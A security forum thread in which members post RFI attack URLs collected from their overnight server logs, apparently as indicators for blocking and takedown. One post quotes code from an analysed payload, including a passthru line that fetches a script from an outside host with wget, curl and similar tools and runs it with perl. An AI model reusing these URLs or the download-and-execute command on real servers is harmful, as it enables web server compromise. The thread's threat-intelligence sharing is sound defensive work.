RFIs

[Orac]

These RFI links were found in our overnight logs, and havnt been seen by us before.

Code: [Select]

http://lamers.za.pl/cmdaff
http://www.geocities.com/tiaraputri47/cantik.txt
http://aceperform.890m.com/test.txt
http://mariosilva.freehostia.com/test.txt
http://jinzlia.com/res/layout/tester.txt
http://www.nameserver11.net/billing2/include/html/klenk.txt
http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt
http://www.geocities.com/amirandacakep/edan.txt
http://emptyhearts.net/entropybanner/id2.txt
http://gukmin.or.kr/bbs/id.txt
http://lokmanch.com/lokmanch/components/r57.txt
http://www.biology.ed.ac.uk/public/conferences/evolbiol2006/sponsors/_/safe.jpg
http://www.imageforum.ru//language/lang_english/languages/test.txt
http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt
http://agrocaes.com.br/site/images/g4.gif
http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt
http://www.ecf.cl/portal/cache/rss40.xml
http://www.phanom.ac.th/msnlist/id.txt
http://www.hairbyerin.net/TotalCalendar_2.4/alba.txt
http://netexpert.hu/~ates2/botnet.txt
http://alltojesus.org/bbs/include/mambo
http://elveon.tripod.com/files/test.txt
http://www.dlkownz.com/sistem.txt
http://agrocaes.com.br/site/images/g4.gif
http://www.geocities.com/tiaraputri47/cantik.txt


[JohnC]

Thank you.

[Orac]

These are "new ones" from last nights logs.

Code: [Select]

http://www.holeshot.co.nz/form/test.txt
http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt
http://www.talentsupplier.com/cdtmp/special.txt
http://www.enricco.cl/catalogo/catalog/images/bot_site.gif
http://www.systel.ru/phpbb2//language/lang_german/list.txt
http://spyd0x.olympe-network.com/id.txt
http://www.hotlinkfiles.com/files/1218752_8bdjr/champer.txt
http://www.cologne-fight-crew.de/templates/idmic22.txt
http://141.84.238.34/.../cmd
http://www.phanom.ac.th/msnlist/id.txt
http://www.fusionn.com/fnn/clients/smarty_old/templates_c/.errors.php/.st/test.txt
http://www.sacredword.net/docs/id2.txt
http://www.sacredword.net/docs/arab.txt
http://g0tcha.fileave.com/id.txt
http://www.imperialfutar.hu/on.txt
http://www.pcr.ac.id/~rina/includes/file/mic.txt
http://www.westminsterakron.com/templates/id2.txt
http://logistics.vec.go.th/cvrl/id.txt
http://southernlivingfurnitureusa.com/news/test.txt
http://www.cgd-k25.org/forum//includes/error/id.txt
http://www.lacomarcaatlantica.com.ar/includes/do.txt
http://listagalaxy.altervista.org/r57
http://216.191.16.12/.shell/site/iyes.txt

[MysteryFCM]

Which reminds me, I must go through and collate those in my servers logs ....

[JohnC]

Thank you.

[Orac]

New ones from the overnights

Code: [Select]

http://geocities.com/emptygold/images/header.jpg
http://www.pop2web.be/n
http://www.studio-wave.com/concept/images/colour.txt
http://www.westminsterakron.com/templates/id.txt
http://www.westminsterakron.com/templates/arab.txt
http://www.garcongay.com/mambots/content/geshi/geshi/cms.php/boo.do
http://iulian.pokol.hu/on.txt
http://www.backbreakacres.com/22/test.txt
http://xoomer.alice.it/meuamor/scan1.txt
http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do
http://www.grandiralecole.fr/cache/cmd7.gif
http://www.garcongay.com/mambots/content/geshi/geshi/cms.php/echo
http://www.cooprr.com//components/com_facileforms/strings.txt
http://www.greytauctions.org/cmd.txt
http://h1.ripway.com/superkint/test.txt
http://www.heimkinopage.de/members/.debug/id1.txt
http://www.suttas.com/files/id.txt
http://findarticlesabout.com/backup/sefe.txt
http://freewebs.com/albcrew/alba.txt


[JohnC]

Thanks.

[Orac]

Last nights newbies, the bottom two are obfuscated botnet scripts that use port 8080 to communicate with the C+C site.

Code: [Select]

http://www.visitesantacatarina.com.br/id.txt
http://www.marcokrasenberg.nl/images/resp.txt
http://www.thenationalcouncil.com/webcalendar/tools/di
http://qsystemsonline.biz/riCo
http://www.mrhard.com/templates/sbherkules/id.txt
http://deddi.uni.cc/tools/test.txt
http://www.gifr.fr/images/cni
http://www.shn.be/components/.debu/ec.txt
http://www.archfuck.ru/administrator/components/com_remository/id
http://rasch.altervista.org/contr.txt
http://mensagenss.hospedagemdesite.com/bot/safe.txt
http://simoneleitao.com/id.txt
http://zesch.net/id.txt
http://dart.prophp.org/.txt
http://140.119.80.185/id2[1]-Naira.txt
http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt
http://212.115.13.140:82//appserv/r.txt
http://www.personal-training-syb.de/images/stories/test.txt
http://www.welkominfo.co.za/lapa/bo.do
http://phanservice.com/id.txt
http://www.wingsart.ru/gstbook/templates/liscence.txt
http://www.idowebhosting.net/catalog/includes/sys.txt
http://www.bes.org.tr/imgcls/cmd2.txt
http://www.studio-wave.com/concept/images/colour.txt
http://www.gomaka.com/gomaka/echo.txt
http://www.tugzip.com/files/xpl/test.txt
http://www.virtualshopindaia.com/id.txt
http://www.hairbyerin.net/TotalCalendar_2.4/alba.txt
http://mysonshomework.eclub.lv/images
http://mybabysbirth.eclub.lv/images

[MysteryFCM]

Few from one of my servers logs;

Code: [Select]

http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?
http://xdengue02.iespana.es/idw.txt???
http://www.virtualshopindaia.com/id.txt?
http://skunk1982.altervista.org/id/mic22.txt?
http://geocities.com/emptygold/images/header.jpg?
http://140.119.80.185/id2[1]-Naira.txt??
http://www.whitsundaychamber.com/id.txt??
http://www.motociclismo.pt/images/banners/canboy?
http://chrystylcoiffure.com/id.txt???
http://www.stickypen.com//modules/xfsection/klenk.txt??
http://photomed.de/uploads/id2.txt?
http://www.imperialfutar.hu/on.txt???????
http://medisana.co.kr/test??
http://www.redladys.net/tgp/alat/idscan7??
ftp://84.32.137.157/incoming/upload/trem/old?
ftp://84.32.137.157/incoming/upload/trem/1
http://body-and-soul-discovery.com/shopping/help.txt?
http://www.yourbesttype.com/id.txt?
http://www.yourbesttype.com/id2.txt?
http://www.yourbesttype.com/arab.txt?
http://broomfield72.org/photos/picnic/thumbs/logo.gif???

[JohnC]

Thanks.

[Orac]

Last nights log gives us the following new links.

Code: [Select]

ftp://84.32.137.157/incoming/upload/trex/oldbisok
ftp://84.32.137.157/incoming/upload/trex/old
ftp://84.32.137.157/incoming/upload/trex/1
http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt
http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt
http://www.pcr.ac.id/~rina/includes/file/mic.txt
http://amygirl.webs.io/pb.php
http://amygirl.3-hosting.net/cs.txt
http://amygirl.siteburg.com/images/cs.txt
http://www.flirtythirties.com/images/wing.jpg
http://www.lacomarcaatlantica.com.ar/includes/do.txt
http://blackid.org/do.bo
http://www.freewebtown.com/xaviooo/xfrango.txt
http://au.ex.ac.uk/~sailing/images/stories/jpg.txt
http://www.tugzip.com/files/xpl/test.txt
http://www.ihmmank.net/mode/id.txt
http://bajigur.net/safe.txt
http://www.marguis.es/marguis/modules/mod_archive/test.txt
http://www.cdpm3.com/id.txt
http://www.systel.ru/phpbb2//language/lang_german/mail.txt
http://www.stiri-mondene.com//on.txt
http://www.stiri-mondene.com//me.txt
http://www.geocities.com/kopet8288/load.txt
http://www.redladys.net/tgp/alat/idscan7
http://www.krigel.borec.cz/skuska/log.txt
http://www.vikings-wanne.de/phpkit/templates/id.txt
http://gukmin.or.kr/bbs/id.txt
http://www.value-one.com/help/cmd7.txt


[MysteryFCM]

The .ac.uk one also references a few more;

Code: [Select]

$bt = 'http://see-my-ip.info/scan.txt';

 $dc = 'http://www.full-comandos.com/jobing/dc.txt';

......

//$scan= passthru('cd /tmp;wget http://xpl.bisa-ba.ca/bin2.txt;fetch http://xpl.bisa-ba.ca/bin2.txt;GET http://xpl.bisa-ba.ca/bin2.txt >> /tmp/bin2.txt;curl http://xpl.bisa-ba.ca/bin2.txt -o /tmp/bin2.txt;lynx -source http://xpl.bisa-ba.ca/bin2.txt > /tmp/bin2.txt;links -source http://xpl.bisa-ba.ca/bin2.txt > /tmp/bin2.txt;perl /tmp/bin2.txt;rm -rf /tmp/bin2.txt');
/edit

.... and

Code: [Select]

$mhost = 'http://www.myspace.si/images/cmd.gif?';
/edit 2

I've given them a call and asked them to e-mail me when it's taken down (if you see any others hosted in the UK, lemme know

[MysteryFCM]

Only two three* in my servers logs today (so far);

Code: [Select]

http://www.mysticmysfits.com/smf/avatars/readme.txt??
http://www.sacredword.net/docs/test.txt???
http://www.cdpm3.com/test.txt???

[Orac]

MysteryFCM fyi when i checked the myspace link, an hour or so after posting the list here, it was 404. The see-my-ip.info and full-command links have been 404 for a long time now, over a year at least.

You really would think the script kiddies would bother to check, and update the links, how else do they expect us to find them 

[MysteryFCM]

LOL! ..... prolly cause the skiddies are too stupid to know how to check or code the things they're using